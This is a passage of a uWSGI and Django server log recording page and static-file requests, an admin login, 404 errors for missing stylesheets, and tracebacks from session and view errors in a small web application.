msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/191] 223.104.39.100 () {40 vars in 954 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62273] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62785] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62017] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62529] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 18965|app: 0|req: 136/192] 223.104.39.100 () {40 vars in 1024 bytes} [Fri Jan 8 13:50:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/193] 223.104.39.100 () {40 vars in 957 bytes} [Fri Jan 8 13:50:54 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/194] 223.104.39.100 () {40 vars in 965 bytes} [Fri Jan 8 13:50:54 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/195] 223.104.39.100 () {40 vars in 940 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/196] 223.104.39.100 () {40 vars in 956 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/197] 223.104.39.100 () {40 vars in 954 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/198] 223.104.39.100 () {40 vars in 946 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/199] 223.104.39.100 () {40 vars in 938 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/200] 223.104.39.100 () {40 vars in 1050 bytes} [Fri Jan 8 13:50:57 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/201] 223.104.39.100 () {40 vars in 1056 bytes} [Fri Jan 8 13:50:57 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/202] 223.104.39.100 () {40 vars in 1015 bytes} [Fri Jan 8 13:50:57 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: 0|req: 137/203] 223.104.39.100 () {48 vars in 1101 bytes} [Fri Jan 8 13:51:03 2021] POST / => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 138/204] 223.104.39.100 () {48 vars in 1101 bytes} [Fri Jan 8 13:51:03 2021] POST / => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 139/205] 223.104.39.100 () {48 vars in 1101 bytes} [Fri Jan 8 13:51:06 2021] POST / => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18965|app: 0|req: 140/206] 223.104.39.100 () {40 vars in 1033 bytes} [Fri Jan 8 13:51:38 2021] GET /home/ => generated 58710 bytes in 26 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 18965|app: 0|req: 141/207] 223.104.39.100 () {40 vars in 1000 bytes} [Fri Jan 8 13:51:38 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 142/208] 101.91.62.99 () {32 vars in 634 bytes} [Fri Jan 8 13:52:37 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 143/209] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 14:10:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 144/210] 83.97.20.34 () {26 vars in 277 bytes} [Fri Jan 8 14:10:56 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 145/211] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 14:11:06 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 18965|app: 0|req: 146/212] 83.97.20.21 () {22 vars in 226 bytes} [Fri Jan 8 14:11:21 2021] OPTIONS / => generated 52540 bytes in 22 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 147/213] 183.136.225.35 () {30 vars in 411 bytes} [Fri Jan 8 14:52:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[uwsgi-http key: sd4404386.adsl.online.nl client_addr: 183.136.225.35 client_port: 51289] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +[pid: 18965|app: 0|req: 148/214] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:00:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 149/215] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:00:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 150/216] 196.52.43.108 () {26 vars in 365 bytes} [Fri Jan 8 15:29:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18965|app: 0|req: 151/217] 223.104.39.27 () {40 vars in 1033 bytes} [Fri Jan 8 15:35:42 2021] GET /home/ => generated 58710 bytes in 26 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 18965|app: 0|req: 152/218] 223.104.39.27 () {40 vars in 1000 bytes} [Fri Jan 8 15:35:43 2021] GET /favicon.ico => generated 3397 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 153/219] 223.104.39.27 () {40 vars in 1023 bytes} [Fri Jan 8 15:35:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/220] 223.104.39.27 () {40 vars in 956 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/221] 223.104.39.27 () {40 vars in 960 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/222] 223.104.39.27 () {40 vars in 958 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/223] 223.104.39.27 () {40 vars in 939 bytes} [Fri Jan 8 15:35:49 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/224] 223.104.39.27 () {40 vars in 964 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/225] 223.104.39.27 () {40 vars in 978 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/226] 223.104.39.27 () {40 vars in 937 bytes} [Fri Jan 8 15:35:50 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/227] 223.104.39.27 () {40 vars in 953 bytes} [Fri Jan 8 15:35:50 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/228] 223.104.39.27 () {40 vars in 955 bytes} [Fri Jan 8 15:35:50 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 18339] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 18851] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 18595] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 17827] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 18965|app: 0|req: 154/229] 223.104.39.27 () {40 vars in 1023 bytes} [Fri Jan 8 15:35:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/230] 223.104.39.27 () {40 vars in 956 bytes} [Fri Jan 8 15:35:54 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/231] 223.104.39.27 () {40 vars in 978 bytes} [Fri Jan 8 15:35:54 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/232] 223.104.39.27 () {40 vars in 937 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/233] 223.104.39.27 () {40 vars in 939 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/234] 223.104.39.27 () {40 vars in 955 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/235] 223.104.39.27 () {40 vars in 953 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/236] 223.104.39.27 () {40 vars in 945 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/237] 223.104.39.27 () {40 vars in 1049 bytes} [Fri Jan 8 15:35:56 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/238] 223.104.39.27 () {40 vars in 1055 bytes} [Fri Jan 8 15:35:56 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/239] 223.104.39.27 () {40 vars in 1017 bytes} [Fri Jan 8 15:35:56 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 155/240] 117.100.100.38 () {40 vars in 1390 bytes} [Fri Jan 8 15:37:13 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 156/241] 117.100.100.38 () {48 vars in 1491 bytes} [Fri Jan 8 15:37:21 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 157/242] 117.100.100.38 () {40 vars in 1395 bytes} [Fri Jan 8 15:37:21 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 158/243] 117.100.100.38 () {40 vars in 1397 bytes} [Fri Jan 8 15:37:21 2021] GET /admin-home/ => generated 15704 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/244] 117.100.100.38 () {38 vars in 1348 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/245] 117.100.100.38 () {38 vars in 1282 bytes} [Fri Jan 8 15:37:21 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/246] 117.100.100.38 () {38 vars in 1294 bytes} [Fri Jan 8 15:37:21 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/247] 117.100.100.38 () {38 vars in 1311 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/248] 117.100.100.38 () {38 vars in 1323 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/249] 117.100.100.38 () {38 vars in 1329 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/250] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:21 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/251] 117.100.100.38 () {38 vars in 1263 bytes} [Fri Jan 8 15:37:22 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/252] 117.100.100.38 () {38 vars in 1275 bytes} [Fri Jan 8 15:37:22 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/253] 117.100.100.38 () {38 vars in 1351 bytes} [Fri Jan 8 15:37:23 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 159/254] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 160/255] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 161/256] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 162/257] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 163/258] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 164/259] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 165/260] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 166/261] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:24 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 167/262] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:24 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/263] 117.100.100.38 () {38 vars in 1273 bytes} [Fri Jan 8 15:37:24 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/264] 117.100.100.38 () {38 vars in 1347 bytes} [Fri Jan 8 15:37:25 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 168/265] 117.100.100.38 () {42 vars in 1428 bytes} [Fri Jan 8 15:37:38 2021] GET /admin-home/ => generated 15704 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 169/266] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:38 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 170/267] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 171/268] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 172/269] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 173/270] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 174/271] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 175/272] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 176/273] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:39 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 177/274] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:39 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/275] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:39 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +delete +[pid: 18965|app: 0|req: 178/276] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:40 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 179/277] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:41 2021] GET /admin-home/ => generated 14177 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 180/278] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 181/279] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 182/280] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 183/281] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 184/282] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 185/283] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 186/284] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 187/285] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:41 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 188/286] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:41 2021] GET 